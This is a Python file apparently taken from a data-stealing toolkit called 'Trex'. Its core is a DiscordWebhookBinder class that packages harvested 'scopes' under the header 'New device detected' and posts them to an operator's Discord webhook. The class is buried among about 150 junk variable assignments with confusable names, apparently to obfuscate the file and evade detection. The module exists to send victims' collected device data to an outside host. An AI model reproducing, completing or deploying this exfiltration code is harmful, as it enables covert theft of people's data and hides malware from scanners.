I230 = 278
WgTafNWNTeeQgVIrCDeqDApIyViaefdblcnGJITBZewXNjAaPiEgDHwVsXqBqPWTjvWfubRaVpMWhox228 = "rrbUmUpdREYTzZLmhADhlmcjsTCJgnDAOrokwqKTTiFgepzytiRgmelGSbQVqxkUbYapDrPdKkFSFhr"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX = "iUhEkuUqYaEEGFdrRWbciGRtzKFtFMhroZKqEXpXWYFlpofIoHahHznGoUhrCUInOVCYhTdrLvVRtgd"
IlIIIlllIlIllIllIIlIIlIIlllllIlIIllIllIIIlIllIIlIlIlIlllllIllIlIllllllllIllllIllllIlIIlIlIlIIIIIIIllIIlIllllIlIIlIlIIIlIllllIlIlIIIIllIIllIlIIllllIIlllIIlIIIllIllllIlIllllIIIlIIlIIIIIIIllIlllllllIlIllIIIlllllIlIlIlllIlIlIIlI = 168
IIIllIllIlIlIIllIIllllllIIllIllIllllIllllIIlIIllIlllIIIIlIIlIIllIllllIlllIllllIIIIIlIIIIllllIIlIlIllIlIIIIIIlIllllIllIllllllIllIIlIllIlllllIlIIIllIllIlIlllIlIlllIIlllllIllIllIlIlIIIIlllllllIlIlIIllIIIlIllIllllIIIIIIIlIlIIl = "wQaagILYpdHdFqkjIAQVYjPDPDxELcLkNcaXvUIiVjiIhVlViCFgJUdcmAFggabLDDnrrXeaeFeWlhK"
W220 = "oDafveQupUhqDLwpLSCaAdkzTeepaiSRfndFqfeqIbUAUxXHmypvhUKBNwJLdRiLuWJBYTcxtKKRfdj"
IlllIIlllllIIIIIIIlllIIIIlIIIIIIllIlllIIlIIIIIIIIlllIlIllllIIIIIllIIlllIIllIlIIllllIlllIllIIIIlIlllIlllIIIIIIllllIIIllIlIIlIlIIIllIIllIIIIIlIIlllIlIIlllllIlllIIlIIlIIIIIIlIlllIIllllIIllIIlIlllllIIlIlIlIlIllIlIllIlIlIII = 436
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx = 700
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = "JJJTpGZmkFENlRkEkXXiJTcCHsUezVUUUxDlaVMJvQUAySFrMoBPvGcdGdsbFRAfahqeJmqIGgboBDN"
r212 = 535
E210 = "YELBpHscYtKUiMMcUXPKIxlPLuFDYieCPNnzYLhxYQTSaSSeTzEjTkYzzSvdrnPktjsCnpZxIjpeLxj"
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = 323
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh = 679
IllIllIIIllllIIlIlIIllIlIllIIllIllIlIIIIlllIllIllllIllIIlllllIIlIlIlllIlIlIIlllIIIlIlIllllIIlIlllllIIIlIlIIIlIIlIIIlIllllIIllllIIIlIIlIIlIIlIIIIllIIIlIIIIIlIIllIIlIIIlIlIlIIlIlIlIIlIIIIIlIIlllllIIIlIIlIlI = 327
Z202 = 383
IllIIIllllIIIIllIIlIIIIlllIlIIIllIIIIlllIllIlIlIlllIlIllllIlIllIlllllIIllllllIIIlIIIIlIlllIlllIlIlIIlIIIIllIIllIIIlIlIIlllIlIlIIllIlIIlIllllIllIIlIlIIIllIIIlllIIIllIlIIlIIIllIllllIIIIlIIIlIIIllIIllIII = "dSiOCxruXRhbTQowWfinfhsilbkcpBDhHswYCElvCRfwCCEQplDDfzIznWJYFfSgUFbogbkqUHCUOap"
l16805274471143663198 = "lRONqXiDIoOSPbrLryJwTOfbGtNsIjGgWpcnoLFJwZPSBpwIkGoEmDjGPZksSaiAOlMMdRQzLBEpIFJ"
iJOWWyZNpaACMslWKuuiIYGUDeLicXMSbdaHtPWIClLAwtjBRQyPIDiOLcQsJvLaivCobLlqXNliYOF196 = "yiDrMXOgwvysAxYxSccuaglfGliExOVHQaiMoVhuMtiIrvcFFrbZfOchBhCpSaKeBWdmsluarMpPfgE"
IIIlIllIIlIlIIIIlIIIIIlllIIlIlIIIllIIllllIIlIIIlIIIIIllIllIllllIIllIIllIlIIlIllIlllllllllllIlIlIIIlIlIIIlIIIlllIlllIlIIIllllIIIlIIIlIlllIllIIIlIlIIlIlllIIlIIIlIIlIlIllllllIIIIllIIIIllIllIIIIlIII = "PUWvVuyzbUTKLMrdPpObZxZsFrWvRgAoqtYtgMXdmvKifZhRxLlCeWJCbSfZqlsQGeUhbpExxFzirGv"
aaaAAAaAaAaAAAaAAAAAaaAaaaAAAaAaaaAaAaAAaaaAAaaAaaaaaAAAAAAaaaaAAAaAaAaAaaaAAaaaAAAaaaAAaaaaAAAaAAAaaaaAaAaAAaaaaAAaAaAAaAAAaaaAaAAAAaaAAAAaaaaaAaaaaaaaaAaAAAAAaaAaAaaaaaaAaAaAaaAaAaaAAAAAaAaa = "EAHyJzpqIeJNSHeapusxQhrvkthzdYfasBtXDqgrGchyaoOIkHXnCTssaMVVbPmYQIRrrlyWpGUFFiV"
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr = 631
pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp = "ShZbPbSreOnjcYOdxTatSQgsMzAhBZmOyyuoykfsWzjBQwHMZwPtRpcyxtdMhiJcFcSJtNJLMHgvTkJ"
h16805274471139412186 = 656
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww = "ocBZwKSPKQKIIkLOvuMDcExupictfZqoigWRkDrkvTfIiLRpvfkMwlNOIqymyhLgMkGUBNuKOEqHpKq"
m16805274471139016182 = "OMjNpFfwPZxHSzrYIGvtWuexffOfRPSEmAuCnvRxKbqMGRwOwZULTiSlXVUgKWDYofdZxlwvBIRDPQZ"
d16805274471138272180 = 383
j178 = 401
IIlllllIIlIIlIlIIIlIllIIIIllllllIIlIlIllIIllIIlllIlllIIIlIIlIIIlIllIlIllIIlIllIIlllIlllIIIlIIlllIllIIIllllllIIIlIlllllllIlIllIllIllIlIllllIlIIIIllIllIlIIIllllllIllIlIIIllllIlII = 313
llIIIlllIIlIllIIllllIlIlIIlIIlIlIIIlIllIIlIlIllIIlIlIlIlIIIIlIIlIlIllIllIlIIIIIlIIlllIlllIIlIlllllIlIIlIlIIlIIllIIIIIllIIIIlllllIllIIIIllllllllllIllIlIlIllIllIllIIIIIIlIlllll = 278
IlIlllIIIIIlIlIlIIIlIIIIllIllIllIlIlIlllIIlIIlIIIlIIIIIIllllIIllllIIIIlIIlIIIIIIIIIIlIlllIllIlIllIIIIllIIlIIlllllIlllllIllllIlllIIIIIllIIIlIIllIlIlIIlIllIlIllllIIIllIIlIIlI = "xwZEBwkLAUaeYJsxiloKRLPjSKGyWfhRKjVALpKKuBYpgFzcHXtXPVRhhdEUcdnxnKNzOcHjrSUxHCp"
W170 = "HenPeKXXoYGFBtTQJWgEKiIHKPnJuQGqjFugDrJigTCCGIKygYPVlAXScuvoflhepQQAQsekinOWRZY"
AaaaAAAaaAaAaAaaaAAaAAaaAaAaaaAAaaaaaaAAaAaAaAaaAaaaAAaaaAaAaAAAaAAAaaAaaaAaAaaAAaAaAAaaAAaaaaaAaAaaAaaAAaaaaaaAAAAAAaaaaAaAAaAAAAaAAaAaaAaAAaAaaaaaAAaaaAaAaAaaAaaAAAaA = "wRwIgNyppcuKxYEchtXVafNEHlLCDdILYCrSNLUZQZRODSiHNJSYZblTTGEZeCMKSvEzwLBietIXfjA"
cDAvhmmvvwMoNmVxNCkrGsejwmjnQbzPOBvZvNwYZnRELyVTIHrbocwOwmYKSpyheKGZfaqlmqPtYuj166 = 295
AaAAAAaaaAAAAAAaAaaaAaaAaAaAaAaAAAaAAAaaaAAAaaAAAAaAaAAAAaAAaaAAAAaaAaaAaAAaAaAAaAaAaAaaAAAAaaAAaAaAaAaAaAAAaAaaaaAAAAaAaaaaaaAaaaAaAaaaAAaAaAAAaAaAaAAAAaaAAaaaaaAA = 648
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = "MXHNYTTqObqgHgDpwvcCtaCLDUrexOeFvLTNEiwDjzrSfkVsFnDiDXAwFCLsIdGKEwMMTjFSSJmadff"
AAAAaaaAaaAaaAaAAAaAAaAAAAaAaaaaAaAaaaaAAaAaaaAAaAAAAaaAaAAaAaAaaAaaAAAAaaaAaAAaaaaAAAaaAaAAaaaaAaAaaaaAAAAAaaAAAaAaaAAAAaaaaaaaaAAAaaAAAAaaaAAAaaAaaAAAaAaaaAaA = "WMKhUTqrCcPYJioEpTANjdxYZxcYFcJdDpDMzvXhOIwmTHdnYdmPfXmxqqERVGVnROwPpqlbEOcRiZn"
WgvNhaaiDkWEIfrwQaOaVYapxCEylsdfqzBTHsOsXWdSIJjyLzlOTEnAqPRVatPEzckyaaiLEsQibCA158 = "rGPkxaekYSpETLPlyeWjkGMQzyLTnZYuHSveOZaIbxqStRKhZfeHHPxodmxxZEgGJWwgeJNtJsSucGt"
UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU = 253
y154 = "cakJuEIzMMCwtkyvsIcLzhHzcEmjxBxDcEEXKNoOtsxrfqtiksRGypPFBRzYMoPudjyYhnHbWzqyiuz"
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii = 372
SdfEqUYZQflvvXtdCBcKAyaOZzuuvhfxwyNoXGJqdRQKcxoocqrZnMFlTCbEqtAkQLDCdxpGkKowYRW150 = "ifVFLNUXIhcZCHUFMllqntpayxypqoqYVrCqIkBfFWYQovFkPfyHYNnqfbqECFcMNCbzwQMItGShxFC"
OSeOJBVBeDfJZMyPEFofYUFJrMLayGNaKfrnhgnYyLZrVqFSxvLlHpRBXQszOmgyBcLjELKHnCisPoo148 = 280
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY = 627
yUdmllKJuqNNTrrFfIhAdobfDwLurZhxrDEWeMVldgWDWrFSNtehtqkLKqCHtkQMdsdPvwfIHffjhjs144 = 358
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA = "CLLGLfqYiwuIcWlUGEkMvCtKXFPtVljZpRhdFpYPDDsGTpTKjOaLVYCXZHSkhOdSjguZgteGlvomKyt"
AAAaAaAAaaAAAaAaAaAaaAaAAAAAAaaAaaaAaaaaAAAaaAaaaAaAaAaAaAaAaaAaaaaAaAAaaaAAAAaaAaAaaAAaaaaaaaaaAaaAAAaAaAAAaAaaaAaAAaAAAAAaAaaaAAaAaAaAaaaA = 320
o138 = "fQanpeNeSXtlAbDnSMhaAvLCVcHmttVGphkDakmgrXuAismsVUMgEMonLIrHlskPNDmgQMwHqKarjlQ"
S136 = 391
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM = "GTsvNHKzxVPQCxzQfHFWCydIqDpmLoxgXVEbvTZowlqZBpDyOUPqBvFsfiDSvtROcxsDAaDfXMjYDoc"
skPMpmZGapOBTLXksFSjxqrvBOmAReDYNRUdfyPiNxQykjuLFohCOqPftyjEqSPAOxtUOAayQuSJeVJ132 = "zhmxFCjsxbzIvYmPNCeYGeqCavybtoMszhOUJWxDQvvotQroPmgTZWiSxxBmXQDVCJNlYsLjQLPXmgB"
AAaAAaAAaaAaAaAaAAAaaAaaAAaaaAaAaaaaAAAAAAAAAaaAaaaaaAAaaAAAAaAaAAAaAAAAaAAaaAAAAaAaAaAAaAaaaAaAaAAaaaAaaAaAaaAaAAAAaAAaaAaAaaAAaA = 242
aAaAAaAAaaAAAaAAAaaAAaaaaAAAAaaAAAaAAaAAAaAaAAaaAaaAaaaAAAAAAAAaaAaAAAaAaaaAAaAAaAaaAaAAAAaaAaAaaaAAAaAaaAAaaAAaaAAAAaAaaAaaaAaa = "lLSIUjqrtFtYLWlKBRCtZcCjvfYdztXHAlKuuprxCqzvTGobLxPgrMAavJIyzndSVoIUHEenpYNGDYt"
aAAaaaaaaAAaAaAAaaAAaaaaAaAAAAAAAAAAaAaAaaAAaaAAaaaaaaAAAAaaaAAaaAAAaAAAaAAaAAaAAAaaAaaaAAaaAaaAAaaaAaAAaAAaAAaAaaaAAaAAaAaaaA = "XYpkTBIXetAOKXJEvrTRRomLtHTZCIZmexkVgRuQInNrjZqPWuzaPDjRQRxfTHiuiTWfMuYINPUuZBK"
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = "aqGujIcabmvqEaNkOjdlmvDvrlomaEPFCJBQTmxnWEFGadaPxgpbrgzXZuhOgWOqJnBcdknfOGdZMJl"
M122 = 232
lllIIIlllllIIIllIIIllIIIIIIIIllllllIIlIIIIlIllIIlIlIlIIIlIllIlIlIlIlIllIIlIlllIIIIIIIIllIllllllIlIlllIlIlllIIIIIllllllll = "SjtELdEHRbaUuiXfqpxdgQbPQGevEEfmTFBIUstTuMLVOOZEHYhotBWnbsLdgOqFBZQVMmUfpArNiOs"
T118 = "AvzBEAzuQsDUmjcrhjoWCPEIkdmOIRBXhqbEBjubAaUJESqnoZafkSRZNTdPFUoYhuBsIAvvzzLvhPF"
H116 = "HkQXwVEEajHFLjzhgAQGJYPaiOFAnXXnMRTgRVBrSfbmouGPPikeVbCtpDwukAZsNVshmbUeDnXJGIS"
B114 = "lQqMrnGZMzeLGYQVNSTbtRxoxSenQZtSZtCwQEKhPwTGdjVkDpXpJbgAKgPOQUEkYGDFznVQXoHiENw"
aaAaaaAAaaaAaaAAaaAAaaaaAaAaAaAAAAaaAAaAAaAAAaaAAaaaAaAaAAaAAAaaAAAAAaaAAAaAAAaaAAAAaaaAaaAaAAAAAaAAAAaaAaaaaAaa = "UdtcERbUiLFPIkFTxmzoXwUVcvnyPtJjpWWZDzWiJGADDQFGZHWIksknMFjzzcbbBSuepTLArTzvdFV"
yZrByaugrqjbioHanhCdTfIARLipBsxLkvWlKGqzilEMioOIHyYDFfAkuzzAqGDcviGwYmyrvJsgNMm110 = 391
AaaAaAaAaAaaAaaAAAAaAAaAaaaAaAaaaaaAaAaAaaAAaAaAAAaAaAaAaAaaAaaaAaAAAAAaAAaAaAAaAaaAAAAaAaaaAaAAaaAAAAaAaaaA = 593
i16805274471114056106 = 510
z16805274471113448104 = "VXxqPVwCKDhZDSGTEWsdCobVQhcOacmNXFdpwYligAQmWwvOGgFROjjPtjRievOpYYiLxttTdFtPzvR"
t102 = 579
uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu = "AYCYpNTBWyZlSWJazCHIZrXpBrwXQHiyqhpxrsWHcjGyKCedCkYZZnbRrJcfZBxCqHLJADLaJwFewzV"
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv = "vfNUTMzPQfGvQuhmEBZSSIqciVwcfCGmkNNqjJgFMtmaDPQCaugURxAIAMgvBBLgzJEzlXdneXZyGRW"
L96 = 244
ItiaUvkMPGjdzQaConxAjJsIPUltTkUUHjgKbpFNBLKjlDgtySSnNGhdwllQRKlpKKredyROttAjtEN94 = "CSbxKrvVqUXJsxFAedIxnzTFOQfaTeSijHjOUlIuDFQBjJILwaNdTDIKznZMAITGxjDNnhMFHkiujWO"
eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee = "YNhdBzuswkJoOBFbMhumcryaRmDbOaeomkoPBDoPFtYrnLAePmSwqopLTPknHnkPgAKlJQCkKWFdIPf"
OtBYVCJoSPadYmIwTzGECSnpGoixExjuwdxQynHFbsNABSQlTIALbqifQxrNlJAlHaPkRizXHJUPZdN90 = 183
IIIIlllIIlIlIlIllIIlIlllIllIlIllIlIllIllllIlllIIIIIIIlllIlllIIIIlIlIIlllIlIIIllIIIllIlll = 592
aAAaaaAAAaaaAAaAaAaAaAAaaaaaaaAAaAaaAAaaaAAAAaaAaaAaAaAAAaaaAAAaaaAAaAaAAaAaaaAAAaAaaA = "ptxDxGbMQbOnpZHiNbJCGIvpAuHbXcQNeqPgPYJSxgkfZcHsZOrWhTWsxEcamGTpwzLQFwqKpKOArpq"
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = 392
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = "SRjIiIyDirVgSTZJEkOeDDhHryYZOPhsyNXQpmrfGdjBHHLDbvMAEvdqPhvwokdwOJlWyfxDKcFTSdw"
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = 316
lIlIIIllIIlIIlIIlIIlIIlIlIIIIlIIllIIlllIIIlIllIllIlIlllIIllIIIllIIlIllIIlllIll = 484
aAAaAAaAaaaAAAaaAAaAAAAaaAAaAaaAaaaaAAaaAaAaAaAaAAaaAAaAaaAAaAAaaaAaaaaaAAAA = "ZbvfShKlPjEDgmgvfTMoHudOPPFtvbJvdZXodmgNRQfdBrcjZMYWdOJogNSDYBKkxNSpzLibjFUEPFT"
e74 = "vBHrbWOMWSQhWvzXCjxpzkwTzCXBDWuTHjJlljPdkGwUIiuNOEijrrCcStRFntMOKhVBNshaRbYDsli"
llIIlIIlllIIIIIIIllIIIIlIlIIllIIIlIllllllIIIIIllIllllllIlIlIllIIllllIlll = "spfcsMyPKRLjbNwIROcPWACsowXgbZiRiMGZSMnozFJJEwZSxAwCmiPlnAqbiYAEcHmkkSrynPjInRV"
lIIlIIlIIIIlIIlIlIIIIIlIIlIIIIllIIIIIIIllIlIlIIIllllIllIlllIlIlIIIIIII = 612
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC = "WISiuLclBuNRgjrdxWdXQQJjquEZGxckfLOiJDjOGNingltdVAMSPnupzzliJtScBQoNvAYbczBWkfn"
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr = "BpGXDwGpVQDmDCCbmgzUfQtwIPiWDXlXIIcEFPWHAzzMmWNvtYmwplNAIINsGEeQuSlbdgKLKDRQLZI"
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = "XEOGgvBUhEDMTuQDDjWenJFymvvThDVTjTuINyrKPCgiujWubBXACGWFeMPcusBYpLjORekvVqrgLDX"
AAaAaaaaAAaaAaaaaaaAAaaAaaaAaaaAAAAaaaAaaaAaAAaaAAAAaAAaaAaAaa = 33
IIIIIlIlllllllIlllllIlIIllIIIIIlIIIIlIIlIllIIIllllIlIlIIIlll = "dGiPPNaCdCreEYrSHOeEyRZYmgLJAgUrNeGKnArMQMlginTnTYuDaqfPPyMiMwKOFtJZixgAgCEGbnc"
aAaAaAAaaaaaaAaAaaaaAaAAAAaaAAAAAAaaaAAAaAaaAaAaaAaAAAaaAa = 472
A1680527447110140356 = 163
lIlllIIlIlIllIIllIIIIIIIlIlIIlIlllIIIlIlllllIlllIlIIlI = 37
lIIIIlllIlllIIIlIIIIIIllllllIllIIlllIllIIIIIIIIIlIIl = "OQwBVokOSqrDrOcfnOqHhLrVJBPPqTEfmHiBLRZTbSLFyKDvUcfRVvEsSBPpBkhdXMlJUikFnRYOptB"
F1680527447109964850 = "YcRWLfpajZiVnbUicRvzKAuArnPahLmZFEUEwVKbZxcpKLefvxZkiTjKpkAvHCTofHLKdyuThwSprMi"
DCInzsIhpJmcUzPQakOlxmTSrVdKJxgIFWyDySkMTYkILZFihqVBtPfqJqvObvyThksbTsCqAtLyTTY48 = 804
VVkPrZskhHSGFxcPaGtdscUaMbZtpxhLXVTMFxvqatBBJostrFAGDtSoChvyCNNIjJHcryYXiONRZah46 = 818
AaAaAaAAaAAAaaAaAAaaaAaAaAAaAAAaaaAaAaaaAAAA = 363
V1680527447109789442 = "DsmwwOVtxcBmPxlxGwiQhTSyRegjwUgbcLYtKbjkMrtAKufgRvSVyDoWHgaxALoKSfiskXXdpnKkeDF"
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn = 126
AaAAaaaaAaAaaaaAaAAAaAAaAAaaAaaAaaaAAA = 162
AaAAaaAAAaAaAAaAAaAaAaAAaaaaAAaAaAaA = 276
nmQxiAnBhpjzEzZZkHjJQCHHtMflWPkUQcMmGqoTQJbLweinseAQbREMAqWrWsTXIhcXgWqowwFlmlr34 = 275
IIIlIIIlIIIlIlIIlIlIIllIllllllll = "VYrwCzZmqOWBVFAbzqOWfnPjOyAnzjrfEfWRvObCRQOlDTRanFZvgRekgDXFicuqEAguhYEyQhSbvBN"
x1680527447109609430 = "HtmEaUmIdyjECOSvXXJKUrWXymfgYxJzUwCZyHATYuPbEmXzZPZsxvDVhUZFUfxvOecnGrROxklDaZU"
vRPxDjuLlAmBJfpkHBuJZDhhnJmqBgwfFDWMEyFLYAlbjDXozruhaXVsGGKMafoLDYHZeAbjXfiAxCh28 = "BhEyDtDxfWsxJMAEsNMopSkvIzaYsdhTUBGxfFAbJruuFealVFkRQSkUCvGMtJKSazSklivcYThRhSr"
IIIIIlIlllIllIlllllIlIlIlI = "RZHdpJeNqsxFpMCYAAhMkLJRyyQYfFHEwSQIfDJVTROtGjmMMZHQtbzOFHKlcyFCZzBhylKLwddfrWQ"
AAAAAAAAAAAAAAAAAAAAAAAA = 278
JfglCsfwovZODwvFBolfTTKMzDxEOwaEdLiviWhVWPFNkoUnMwrAVTBiXjqpYPkRosIRNIWkfPZwziC22 = 288
nrtWRjwBMIeipwHQZlNIEUNzMVUoZZsWnHgHfgJnjLdazfwveIYRQpVPopkXLyZMIhTWEeGmbkBKgiG20 = "HYvoyBQldllxvGObXkCjjsqPsJEgwztMDxWpoBkxjEIUYviFnLJQmmvUyfLWMrJTIopqZzcTVVBSsqz"
aAAaaAaAAAaAaaaaAa = "MmrbxGEmSsdihuEBpCYpWJqFiDgWrewQFVHZqwuRWDDkTtHdzmFkaoLXQXtXeMwoavoTdlqTtRdjAXO"
U168052744710927616 = "PiKhcqrKBFiRzfgzjmupHtAuepKeIQiOiUdOZhYhGHKPlbWNswIzpmWOSKwrQibYXskwKveRsntNoxU"
JJJJJJJJJJJJJJ = 444
lIIlllIIllll = "KgzPSWLKPxSDBtFBTgVTvPVbkFlEdkYMZVVkJYbBMunPkJSUftrWLRKgAKXXzhRqyRzQZlKRumjGkur"
aAaAaAAaAa = "iUewljfyKEbmmfEorMIdrHyqxVFaWajvKYzlDUkZPChqtmxfbNdhvTgXHjYPHnwAjJjVegSpMBpXCpd"
aAAaaAAa = 610
PPPPPP = "OElxyDYQHDXDAqMCHWfJlkBxfDgFaRYSWtwRyOfBeWrILjwtRlPAQDFeirvpjcYShmaKsUMhfbbMEXH"
b4 = "fQfFtUyhtXEFkbqIDoVvOTEDLhjLafaVwKZqxduuIupwJtMbZerbYaFRTWWpWagCcAnKgMgtACFfsJZ"
RR = "KTKCRtmwRsKPwyLJTzKJibNvPMYQZgonZzaOnMGBOIUXFVXlhaJifzgxHLJjgycjRhKObPEtKMUNpGp"

from binder import Binder
import requests

class DiscordWebhookBinder(Binder):

    def __init__(self, k3, l="Trex", a2="https://cdn-icons-png.flaticon.com/512/2313/2313448.png"):
        self.webhook_url = k3
        self.username = l
        self.avatar_url = a2

    def _generate_payload_content(self, scopes):
        CCCCCC = "**New device detected:**\n"
        for scope in scopes:
            CCCCCC += "**" + scope["name"] + ":** " + scope["value"] + "\n"
        if len(CCCCCC) > 1000:
            # divide into multiple messages and return as array
            return CCCCCC.split("\n")
        return [CCCCCC]

    def _generate_payload(self, scopes):
        CCCCCC = []
        g168052744710864078 = self._generate_payload_content(scopes)
        for c in g168052744710864078:
            CCCCCC.append({
                'username': self.username,
                'avatar_url': self.avatar_url,
                'content': c
            })
        return CCCCCC

    def send(self, scopes):
        aaaAaaAAa = self._generate_payload(scopes)
        for payload in aaaAaaAAa:
            requests.post(self.webhook_url, data=payload)
f1 = "UEdWWwrtxWGSvNddwDIAtfhngKYPOhYSUYukPrAQxRoaGfNssaZwGQPDZPuSyREhvCQSKRibyElgTNm"
H3 = "FoNZYOoIJWwSXZYjyDuTlAqvrlahoujHzWMEABnKYOCEHZonmKMXRaZdKODwpZPMkSgNrLnrtSmcLia"
N5 = "KfChAFLrrMZLcLKglGoibhNGjEsYIcoimhsgIgxPrHyQFhcdoojpGabTDaDYGFBDXZtUSrNpfLJDmCu"
g7 = 524
Z168052744710912069 = "oVleWZdUkPLaCaOVZOYDuWHWkXuIMPsvAMnmXGFwMulvTHpINLYkmOwWfiuCyqJDpaWbkwgoQApDlfP"
H11 = "jeXOamdsoRYWJxBGkdsibwXOIEmlxZfcYkamuZOJZrZWsduwZFFwKledJQNabsBIdRGPspQOASZAvMj"
a1680527447109238613 = "jjGAoHQwtHXlPKBnFtgeOmmSXKqafmiLYiEczZFJpZgRtTnRAbDdKmnwhioeNsUtmqJSFQIUIhIORKY"
C15 = 493
AaAAaaaaaaaAAaAAA = 341
ddddddddddddddddddd = 452
IIIllIIlIIlIIIllIllll = 196
AaAaaaaaAAaAaaaAAAAaaaA = 763
Y168052744710944725 = "RrLWGqXJmqWwGXuKnjaQMePRidEWRfoJMJWInfdFtFYSrWnTlcHgRGVTlqcnUXpJoINrwxaNQdKjQVI"
